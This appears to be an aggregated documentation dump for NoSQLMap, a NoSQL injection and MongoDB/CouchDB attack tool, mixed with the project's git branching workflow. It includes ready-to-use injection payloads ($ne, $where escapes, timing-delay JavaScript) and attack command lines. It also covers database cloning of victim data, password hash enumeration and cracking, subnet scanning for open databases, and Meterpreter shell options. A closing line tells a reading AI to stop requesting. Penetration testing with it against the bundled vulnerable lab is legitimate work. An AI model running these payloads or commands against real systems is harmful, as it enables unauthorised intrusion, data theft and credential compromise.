### Install NoSQLMap via Repository Source: https://context7.com/codingo/nosqlmap/llms.txt Clone the repository and install dependencies using setup.py, or execute the script directly. ```bash # Clone the repository git clone https://github.com/codingo/NoSQLMap.git cd NoSQLMap # Install using setup.py python setup.py install # Or run directly without installation python nosqlmap.py ``` -------------------------------- ### Start NoSQLMap Source: https://github.com/codingo/nosqlmap/blob/master/README.md Initial command to launch the NoSQLMap interactive menu. ```bash python NoSQLMap ``` -------------------------------- ### Install NoSQLMap Dependencies Source: https://github.com/codingo/nosqlmap/blob/master/README.md Run this script as root to automate the installation of NoSQLMap's dependencies on Debian or Red Hat based systems. ```bash sudo python setup.py install ``` -------------------------------- ### Launch Interactive Mode Source: https://context7.com/codingo/nosqlmap/llms.txt Start the menu-driven interface to configure targets and select attack vectors. ```bash python nosqlmap.py # Main menu options: # 1-Set options # 2-NoSQL DB Access Attacks # 3-NoSQL Web App attacks # 4-Scan for Anonymous MongoDB Access # 5-Change Platform (Current: MongoDB) # x-Exit ``` -------------------------------- ### NoSQLMap Main Menu Source: https://github.com/codingo/nosqlmap/blob/master/README.md The primary interface options presented upon starting the tool. ```text 1-Set options (do this first) 2-NoSQL DB Access Attacks 3-NoSQL Web App attacks 4-Scan for Anonymous MongoDB Access x-Exit ``` -------------------------------- ### Execute Web Application GET Attack Source: https://context7.com/codingo/nosqlmap/llms.txt Automate injection testing against GET parameters using command-line arguments. ```bash # Test for NoSQL injection in a GET parameter docker-compose run --remove-orphans nosqlmap \ --attack 2 \ --victim host.docker.internal \ --webPort 8080 \ --uri "/acct.php?acctid=test" \ --httpMethod GET \ --params 1 \ --injectSize 4 \ --injectFormat 2 \ --doTimeAttack n # Attack options: # --attack 1 = NoSQL DB Access Attacks # --attack 2 = NoSQL Web App attacks # --attack 3 = Scan for Anonymous platform Access ``` -------------------------------- ### Scripting NoSQLMap Attacks Source: https://github.com/codingo/nosqlmap/blob/master/README.md Examples of running automated attacks against the vulnerable application using Docker. ```bash $ echo "1. Account Lookup (acct.php)" $ docker-compose run --remove-orphans nosqlmap \ --attack 2 \ --victim host.docker.internal \ --webPort 8080 \ --uri "/acct.php?acctid=test" \ --httpMethod GET \ --params 1 \ --injectSize 4 \ --injectFormat 2 \ --doTimeAttack n $ echo "2. User Data Lookup (userdata.php) - JavaScript Injection" $ docker-compose run --remove-orphans nosqlmap \ --attack 2 \ --victim host.docker.internal \ --webPort 8080 \ --uri "/userdata.php?usersearch=test" \ --httpMethod GET \ --params 1 \ --injectSize 4 \ --injectFormat 2 \ --doTimeAttack n $ echo "3. Order Data Lookup (orderdata.php) - JavaScript Injection" $ docker-compose run --remove-orphans nosqlmap \ --attack 2 \ --victim host.docker.internal \ --webPort 8080 \ --uri "/orderdata.php?ordersearch=test" \ --httpMethod GET \ --params 1 \ --injectSize 4 \ --injectFormat 2 \ --doTimeAttack n ``` -------------------------------- ### Run Vulnerable Application Source: https://github.com/codingo/nosqlmap/blob/master/README.md Command to build and start the intentionally vulnerable web application using Docker Compose. ```bash docker-compose build && docker-compose up ``` -------------------------------- ### Build NoSQLMap Docker Image Source: https://github.com/codingo/nosqlmap/blob/master/README.md Build a Docker image for NoSQLMap by navigating to the project directory and running the docker build command. ```bash docker build -t nosqlmap . ``` -------------------------------- ### Deploy and Test Vulnerable Application Source: https://context7.com/codingo/nosqlmap/llms.txt Use Docker to launch the provided vulnerable application and execute a test attack against it. ```bash # Start the vulnerable application stack: cd vuln_apps docker-compose build && docker-compose up # Access the test application: # http://127.0.0.1:8080/index.html # Vulnerable endpoints: # /acct.php?acctid= - Account lookup # /userdata.php?usersearch= - User data search # /orderdata.php?ordersearch= - Order data search # Test script example: docker-compose run --remove-orphans nosqlmap \ --attack 2 \ --victim host.docker.internal \ --webPort 8080 \ --uri "/userdata.php?usersearch=test" \ --httpMethod GET \ --params 1 \ --injectSize 4 \ --injectFormat 2 \ --doTimeAttack n ``` -------------------------------- ### NoSQLMap Configuration Options Source: https://github.com/codingo/nosqlmap/blob/master/README.md Detailed breakdown of the configuration settings available in the menu. ```text 1. Set target host/IP-The target web server (i.e. www.google.com) or MongoDB server you want to attack. 2. Set web app port-TCP port for the web application if a web application is the target. 3. Set URI Path-The portion of the URI containing the page name and any parameters but NOT the host name (e.g. /app/acct.php?acctid=102). 4. Set HTTP Request Method (GET/POST)-Set the request method to a GET or POST; Presently only GET is implemented but working on implementing POST requests exported from Burp. 5. Set my local Mongo/Shell IP-Set this option if attacking a MongoDB instance directly to the IP of a target Mongo installation to clone victim databases to or open Meterpreter shells to. 6. Set shell listener port-If opening Meterpreter shells, specify the port. 7. Load options file-Load a previously saved set of settings for 1-6. 8. Load options from saved Burp request-Parse a request saved from Burp Suite and populate the web application options. 9. Save options file-Save settings 1-6 for future use. x. Back to main menu-Use this once the options are set to start your attacks. ``` -------------------------------- ### Deploy NoSQLMap with Docker Source: https://context7.com/codingo/nosqlmap/llms.txt Run the tool in an isolated container environment using Docker or Docker Compose. ```bash # Build and run with Docker docker build -t nosqlmap . docker run -it nosqlmap # Or use Docker Compose docker-compose build docker-compose run nosqlmap ``` -------------------------------- ### Configure Attack Options Source: https://context7.com/codingo/nosqlmap/llms.txt View available settings for target hosts, ports, and request methods within the interactive menu. ```bash # Options menu provides these settings: # 1-Set target host/IP (Current: Not Set) # 2-Set web app port (Current: 80) # 3-Set App Path (Current: Not Set) # 4-Toggle HTTPS (Current: OFF) # 5-Set MongoDB Port (Current: 27017) # 6-Set HTTP Request Method (GET/POST) (Current: GET) # 7-Set my local MongoDB/Shell IP (Current: Not Set) # 8-Set shell listener port (Current: Not Set) # 9-Toggle Verbose Mode: (Current: OFF) # 0-Load options file # a-Load options from saved Burp request # b-Save options file # h-Set headers # x-Back to main menu ``` -------------------------------- ### Run NoSQLMap with Docker Compose Source: https://github.com/codingo/nosqlmap/blob/master/README.md Use Docker Compose to build and run NoSQLMap. This is useful for managing the application and its dependencies within a containerized environment. ```bash docker-compose build docker-compose run nosqlmap ``` -------------------------------- ### Database Cloning Workflow Source: https://context7.com/codingo/nosqlmap/llms.txt NoSQLMap facilitates cloning remote MongoDB or CouchDB databases to a local instance for offline analysis. This requires local database servers to be running and the myIP option to be configured. ```bash # Prerequisites: # - Local MongoDB running on default port 27017 # - myIP option configured to local database server IP # Clone workflow (MongoDB): # 1. Select option 4 "Clone a Database" from attack menu # 2. Select database from enumerated list # 3. Provide credentials if required # 4. Database cloned as "originalname_stolen" # Clone workflow (CouchDB): # 1. Local CouchDB must be running on port 5984 # 2. Select database to replicate # 3. Database copied via CouchDB replication API ``` -------------------------------- ### Execute Web Application POST Attack Source: https://context7.com/codingo/nosqlmap/llms.txt Test data submission parameters in POST requests for NoSQL injection vulnerabilities. ```bash # Test POST request parameters python nosqlmap.py \ --attack 2 \ --victim 192.168.1.100 \ --webPort 80 \ --uri "/login.php" \ --httpMethod POST \ --postData "username,test,password,test123" \ --injectedParameter 1 \ --injectSize 6 \ --injectFormat 1 # Post data format: param1,value1,param2,value2 # --injectedParameter specifies which parameter to inject (1-based index) ``` -------------------------------- ### CouchDB Server Enumeration Source: https://context7.com/codingo/nosqlmap/llms.txt NoSQLMap can retrieve version and platform information for CouchDB instances. It also enumerates databases, users, and password hashes, aiding in the assessment of CouchDB security. ```bash # CouchDB attack menu options: # 1-Get Server Version and Platform # 2-Enumerate Databases/Users/Password Hashes # 3-Check for Attachments (still under development) # 4-Clone a Database # 5-Return to Main Menu # Server info output: # Server Info: # CouchDB Version: 2.1.1 # Database enumeration output: # List of databases: # _users # _replicator # myapp_data # # Database Users and Password Hashes: # Username: admin # Hash: 5f4dcc3b5aa765d61d8327deb882cf99 # Salt: abc123def456 ``` -------------------------------- ### Configure Custom HTTP Headers Source: https://context7.com/codingo/nosqlmap/llms.txt NoSQLMap allows configuration of custom HTTP headers, essential for testing applications that require specific headers like authentication tokens or cookies. This can be done interactively or via command-line arguments. ```bash # Set headers interactively (option 'h' in options menu): # Enter HTTP Request Header data in comma separated list: # Cookie,session=abc123,Authorization,Bearer token123 # Command line header configuration: python nosqlmap.py \ --attack 2 \ --victim example.com \ --webPort 443 \ --https ON \ --uri "/api/search?q=test" \ --httpMethod GET \ --requestHeaders "Cookie,sessionid=abc123,X-API-Key,secretkey" ``` -------------------------------- ### MongoDB Server Enumeration Source: https://context7.com/codingo/nosqlmap/llms.txt After connecting to a MongoDB instance, NoSQLMap can enumerate server version, platform details, databases, collections, and check for GridFS. This is useful for understanding the target environment. ```bash # After connecting to MongoDB (via attack option 2 in main menu): # Attack menu options: # 1-Get Server Version and Platform # 2-Enumerate Databases/Collections/Users # 3-Check for GridFS # 4-Clone a Database # 5-Launch Metasploit Exploit for Mongo < 2.2.4 # 6-Return to Main Menu # Server enumeration output example: # Server Info: # MongoDB Version: 3.4.10 # Debugs enabled: False # Platform: 64 bit # Database enumeration output example: # List of databases: # admin # local # testdb # # List of collections: # admin: # system.users # system.version # # testdb: # users # orders ``` -------------------------------- ### Create and Push Hotfix Branch Source: https://github.com/codingo/nosqlmap/wiki/Information-for-Contributors Use this to create a new local hotfix branch from 'stable' and make it remotely available on GitHub. ```bash git checkout -b hotfix-id stable // creates a local branch for the new hotfix git push origin hotfix-id // makes the new hotfix remotely available ``` -------------------------------- ### Burp Suite Integration Source: https://context7.com/codingo/nosqlmap/llms.txt NoSQLMap can import HTTP requests saved from Burp Suite to automatically configure target options. It also supports saving and loading NoSQLMap configuration options for reuse. ```bash # Save a request from Burp Suite to a file (burp_request.txt): # GET /app/search?query=test HTTP/1.1 # Host: example.com # Cookie: session=abc123 # User-Agent: Mozilla/5.0 # Load in NoSQLMap: # Select option 'a' from options menu # Enter path to Burp request file: burp_request.txt # Host and URI automatically populated from request # Save/load NoSQLMap options for reuse: # Option 'b' - Save current options to file # Option '0' - Load options from previously saved file ``` -------------------------------- ### Create and Push Feature Branch Source: https://github.com/codingo/nosqlmap/wiki/Information-for-Contributors Use these commands to create a new local feature branch from master and make it available remotely on GitHub. Ensure development is not confined to a single local branch. ```bash git checkout -b feature-id master git push origin feature-id ``` -------------------------------- ### Execute Timing-Based Injection Payloads Source: https://context7.com/codingo/nosqlmap/llms.txt Use these JavaScript payloads to detect blind NoSQL injection vulnerabilities by measuring server response delays. ```bash # Timing attack payloads inject JavaScript delays: # String escape timing payload: # a'; var date = new Date(); var curDate = null; # do { curDate = new Date(); } # while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); # return; var dummy='! # Integer escape timing payload: # 1; var date = new Date(); var curDate = null; # do { curDate = new Date(); } # while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); # return; var dummy=1 # Output interpretation: # HTTP load time variance was 26 seconds! Injection possible. # HTTP load time variance was only 2 seconds. Injection probably didn't work. ``` -------------------------------- ### Create and Push Bug Branch Source: https://github.com/codingo/nosqlmap/wiki/Information-for-Contributors Create a local bug branch from master and push it to GitHub to make it publicly available. This follows the convention 'bug-'. ```bash git checkout -b bug-id master git push origin bug-id ``` -------------------------------- ### Export Injection Test Results Source: https://context7.com/codingo/nosqlmap/llms.txt Save identified vulnerabilities and attack outcomes to a text file for reporting. ```bash # After web application tests complete: # Save results to file (y/n)? y # Enter output file name: results.txt # Output file format: # Vulnerable URLs: # http://target/page.php?id[$ne]=test # http://target/page.php?id=a'; return db.a.find(); var dummy='! # # Possibly Vulnerable URLs: # http://target/page.php?id=1; return this.a != 'test'; var dummy=1 # # Timing based attacks: # String Attack-Successful # Integer attack-Unsuccessful ``` -------------------------------- ### Execute Direct Database Attack Source: https://context7.com/codingo/nosqlmap/llms.txt Perform direct enumeration and authentication testing against MongoDB or CouchDB management ports. ```bash # Direct MongoDB database attack python nosqlmap.py \ --attack 1 \ --platform MongoDB \ --victim 192.168.1.100 \ --dbPort 27017 \ --myIP 192.168.1.50 \ --myPort 4444 # Direct CouchDB database attack python nosqlmap.py \ --attack 1 \ --platform CouchDB \ --victim 192.168.1.100 \ --dbPort 5984 \ --myIP 192.168.1.50 ``` -------------------------------- ### Password Hash Cracking Source: https://context7.com/codingo/nosqlmap/llms.txt NoSQLMap supports dictionary and brute-force attacks to crack recovered password hashes. It allows selection of character sets and maximum password length for brute-force attempts. ```bash # When password hashes are discovered, cracking options are presented: # Select password cracking method: # 1-Dictionary Attack # 2-Brute Force # 3-Exit # Dictionary attack prompts: # Enter path to password dictionary: /usr/share/wordlists/rockyou.txt # Running dictionary attack... # Found - admin:password123 # Brute force options: # Enter the maximum password length to attempt: 8 # 1-Lower case letters # 2-Upper case letters # 3-Upper + lower case letters # 4-Numbers only # 5-Alphanumeric (upper and lower case) # 6-Alphanumeric + special characters # Select character set to use: 5 # Combinations tested: 1000 # Found - admin:abc123 ``` -------------------------------- ### Merge Hotfix into Stable and Tag Source: https://github.com/codingo/nosqlmap/wiki/Information-for-Contributors After hotfix development is complete, merge changes into the 'stable' branch and update the tag. ```bash git checkout stable // change to the stable branch git merge --no-ff hotfix-id // forces creation of commit object during merge git tag -a // tags the fix git push origin stable --tags // push tag changes ``` -------------------------------- ### Web Application Injection Tests Source: https://context7.com/codingo/nosqlmap/llms.txt NoSQLMap performs eight primary injection tests against web application parameters to identify vulnerabilities. These tests target different injection types like associative array injection and string/integer escapes for MongoDB. ```text Test 1: PHP/ExpressJS != associative array injection Payload: param[$ne]=value ``` ```text Test 2: $where injection (string escape) Payload: a'; return db.a.find(); var dummy='! ``` ```text Test 3: $where injection (integer escape) Payload: 1; return db.a.find(); var dummy=1 ``` ```text Test 4: $where injection string escape (single record) Payload: a'; return db.a.findOne(); var dummy='! ``` ```text Test 5: $where injection integer escape (single record) Payload: 1; return db.a.findOne(); var dummy=1 ``` ```text Test 6: This != injection (string escape) Payload: a'; return this.a != 'randValue'; var dummy='! ``` ```text Test 7: This != injection (integer escape) Payload: 1; return this.a != randValue; var dummy=1 ``` ```text Test 8: PHP/ExpressJS > Undefined Injection Payload: param[$gt]= ``` -------------------------------- ### Scan for Anonymous Database Access Source: https://context7.com/codingo/nosqlmap/llms.txt Identify vulnerable MongoDB or CouchDB instances across subnets or from a list of IP addresses. ```bash # Scan subnet for anonymous MongoDB access python nosqlmap.py --attack 3 --platform MongoDB # Interactive scanner options: # 1-Scan a subnet for default MongoDB access # 2-Loads IPs to scan from a file # 3-Enable/disable host pings before attempting connection # x-Return to main menu # Example subnet input: 192.168.1.0/24 # Example IP list file format (one IP per line): # 192.168.1.10 # 192.168.1.20 # 192.168.1.30 ``` -------------------------------- ### Merge Hotfix into Master and Delete Branch Source: https://github.com/codingo/nosqlmap/wiki/Information-for-Contributors Merge the hotfix changes into the 'master' branch to prevent loss and then delete the remote hotfix branch. ```bash git checkout master // change to the master branch git merge --no-ff hotfix-id // forces creation of commit object during merge git push origin master // push merge changes git push origin :hotfix-id // deletes the remote branch ``` -------------------------------- ### Complete Feature Branch Workflow Source: https://github.com/codingo/nosqlmap/wiki/Information-for-Contributors Once feature development is complete, merge the feature branch into master, push the changes, and delete the remote feature branch. ```bash git checkout master git merge --no-ff feature-id git push origin master git push origin :feature-id ``` -------------------------------- ### Complete Bug Branch Workflow Source: https://github.com/codingo/nosqlmap/wiki/Information-for-Contributors After bug development is finished, merge the bug branch into master, push the changes, and delete the remote bug branch. ```bash git checkout master git merge --no-ff bug-id git push origin master git push origin :bug-id ``` -------------------------------- ### Merge Master into Feature Branch Source: https://github.com/codingo/nosqlmap/wiki/Information-for-Contributors Periodically merge changes from the master branch into your feature branch to keep it up-to-date. ```bash git merge master ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.